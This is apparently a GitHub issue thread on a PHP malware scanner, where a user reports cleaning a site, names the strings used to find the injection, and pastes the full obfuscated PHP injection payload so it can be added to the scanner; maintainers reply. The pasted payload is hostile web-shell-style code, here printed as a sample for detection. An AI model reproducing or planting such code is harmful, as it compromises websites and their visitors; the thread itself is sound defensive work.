New Injection code

[rufnek2k4]

First of all, thanks for the effort.

I just fixed a site injected with this new code that has no base64_decode function. Fixed it by searching "\x" and "?><?php" on every file.

Can you include this in your scanner?
Thanks!

actual code:

b%x5c%x7825Z<#opo#>b%x5c%x7825!_##>>X)!gjZ<#opo#>b%!%x5c%x7825tww!>!%x5c%x782400~:5h%x5cw#)ldbqov>_ofmy%x5c%x7825)utjm!|!_5!%x5c%x7827!hmg%x5c%x7825)!)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%2p%x5c%x7825!|!_!_**b%x5c%x445]212]445]43]321]464]284]367827,_e%x5c%x7827,_d%x5c%x7827,_c%x5c%x7827,_b%x5c%x7827)f8]y6g]273]y76]271]y7d]252]y74]256#j%x5c%x7827878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x782525r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x5c%x7827jsv%x5c%x78256^#zsfvr#%x5c%x785cq%<*K)ftpmdXA6~6%x5c%x782f7&6|7**1%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x!#]x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2judovg%x5c%x7822)!gj}1~!<2p%6%x75%156%x61"]=1; functiomjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!72]48y]#>m%x5c%x7825:|:_r%x5c%x7825:-t%x5c%x7825)3of:opjudovgnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e5c%x7825bG9}:}.}-}!#_<%x5c%x7825nfd>%x5c%x782y76]277]y72]265]y39]274]y85]273]y6g]273]y7f+_0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]24x7825)tpqsut>j%x5c%x7825!_72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%xx5c%x7824-%x5c%x7824<%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;ub%x5c%x7825!>!2p%x5c%x7825!_3>?_2b%x5c%x7825)gpf{jt)!gj!<_h>EzH,2W%x5c%x7825wN;#-Ez-1H_WCw_[!%x5c%x7825rN}#QwTW%x5]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6q%x5c%x78256<%x5c%x787fw6_%x5c%x787f_)323zbek!~!!#]y81]273]y76]25if((function_exists("%x6f%142%x5f%163%x74%141%x72%164") &&_QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860XA6|7__197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<5)m%x5c%x7825=_h%x5c%x7825)m%x5c%x7825):fmji%x5c%x%x5c%x78256<%x5c%x787f5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%ftmbg}%x5c%x787f;!osvufs}w;_%x5c%x787f!>>y83]273]y72]282#!#]y84]275]y8y]}R;2]},;osvufs}%x5c%x7827;m24-%x5c%x7824%x5c%x785c%x5c5fdy!%x5c%x7825tdz&)7gj6<.[A%x5c%x7827&6<%x5j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#px782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpp3]248]y83]256]y81]265]y72825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256jQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x78tmw)%x5c%x7825tww**WYsboepn)%x5c%x78x5c%x7825j:^Ew:Qb:Qc.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6_%x5c%x8]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]6787f__#fmjgk4%x5c%x7860{6~6.%x5c%x7825!<**_f%x5c%x<~%x5c%x7824!%x5c%x78242178}527}88:}334}47<_&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&Qtjw)#]82#-#!#-%x5c%x782525>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c{ftmfV%x5c%x787f<_X&Z5z>32%x5c%x782,6<_)ujojR%x5c%x7827id%x7825!<_::::::-111112{h%x5c%x7825)sutcvt)!gj!|!_bubE{h%x5c%x7825)j{%x5c%x7825#%x5c%x782f#o]#%x5c%x782f_)323zbe!-#jt0_?]+^?]_9275fubmgoj{h1:|:_mmvo:>:iuhofm%x5c%x7825:-5ppde:M4P8]37]278]225]241]334]368]322]3]364]%x72%162%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%15_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%256!bssbz)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%5c%x78273qj%x5c%x78256<_Y%x5c%x7825c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!_9!%x5x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7pd#)tutjyf%x5c%x7860opnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x76]283]427]36]373P6]36]73]8x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825825>2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%x7825V<_#fopoV;h)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hWpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%hnpd!opjudovg!|!__#j{hnx5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7h#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)id5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%4-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%%x5c%x7860hA%x5c%x7827pd%x5c%x78mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825]D6]281L1#%x5c%x782fc%x787fw6_%x5c%x787f__#[k2%x5c%x72bd%x5c%x7825-#1GO%x2)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x782w6_%x5c%x787f__#ujojRk35c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!_uyfu%_#fubfsdXk5%x5c%x7860{66~6<&w6<%x5]84#-!OVMM_<%x22%51%x29%51%x29%73", NULL); }epdof.)fepdof.%x5c%x782825j,,_!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x76<%x5c%x787fw6_CWtfs%x5c%x7825)7gj6<_id%x5c%x7825)ftpmdR6<_id%x5c%x78ubn%x5c%x7860hfsq)!sp!_#ojneb#_56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd1x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x782%x7825bss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782ssutRe%x5c%x7825)Rd%x5c%x7825)Rb%xK9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x782~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#_<%x5c%x7825nfd)##Qtpz)#]341]8811127-K)ebfsX%x5c%x7827u%%x7825w6Z6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256s%x5c%x7825<#462]47y]252]76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c&S{ftmfV%x5c%x787f<_XAZASV<_w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25:W~!%x5c%x7825z!>2q%x5c%x7825<#762]67y]562]38y]5%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rrojepdoF.uofuopD#)sfebfI{_w%x5c%x7825)kV%x5c%%x5c%x7822!pd%x5c%x7825)!gj}Z;h!c%x7825c!>!%x5c%x7825i%x5c%x785c2^1<%x5c%x7825b:>11<%x5c%c%x7825hIr%x5c%x785c1^-%x5c%x7825rx7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uq57>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%xx5c%x7825!<_#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{__u%x5c%x782y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L5297e:56-%x5c%x7878r.98#%x5c%x782f#p#%x5c%x782f%x5c%x7825z>2_!%x5c%x782e%x5c%x78b%x5c%x7825g6<_rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x1%x5c%x7825s:%x5c%x77878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825pt)%x5c%x7825z-#:#_%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x7860QUUI&b%x5c%x7825!|!_7824!>!fyqmpef)#%x5c%x7824_!#]y3d]51]y35]256]y767825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824_!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!t5c%x7825))!gj!<_#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssb824-%x5c%x7824_1<%x5c%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<_qp%x5c%x7825-_.%x5c,Bjg!)%x5c%x7825j:>>1_!%x5c%x7825b:>825}X;!sp!_#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%xH#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#25)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7827822)gj!|!_nbsbq%x5c%x7825)323ldfidk!~!<2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%1348y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x786]271]y7d]252]y74]256]y39]252]tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20Qx5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x782x5c%x7825!**X)ufttj%x5c%x%x78%62%x35%165%x3a%146%x21%!>>>!}_;gvc%x5c%x7825}&;61%154%x28%151%x6d%16P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#_<%x85c%x5c%x7825j:.2^,%x5c%x7825b:%x5c%x7825s:%x5c%x785c%gj!|!_1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%xy>#]D4]273]D6P2L5P6]x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x|!_#91y]c9y]g2y]#>>_4-1-bubEovg+)!gj+{e%x5c%x7825!osvufs!_!+A!>!{e%x5c%x7825)!>>%x5c%tmbg!osvufs!|ftmf!~<__9.-j%x__qp%x5c%x7825!-uyfu%x2%x5c%x7824!#]y81]273]y76]258]y6g]273]y76]271]y7d]2c%x7827!hmg%x5c%x7825)!gj!~

[darookee]

I modified this script to work with multiple custom patterns here 4df5ccb, but I had no luck (and time for that matter) to get it working with escaped unicode characters (\x64\x65...). Maybe you can add a few patterns to that list...

[mikestowe]

Will look into this - thank you for posting...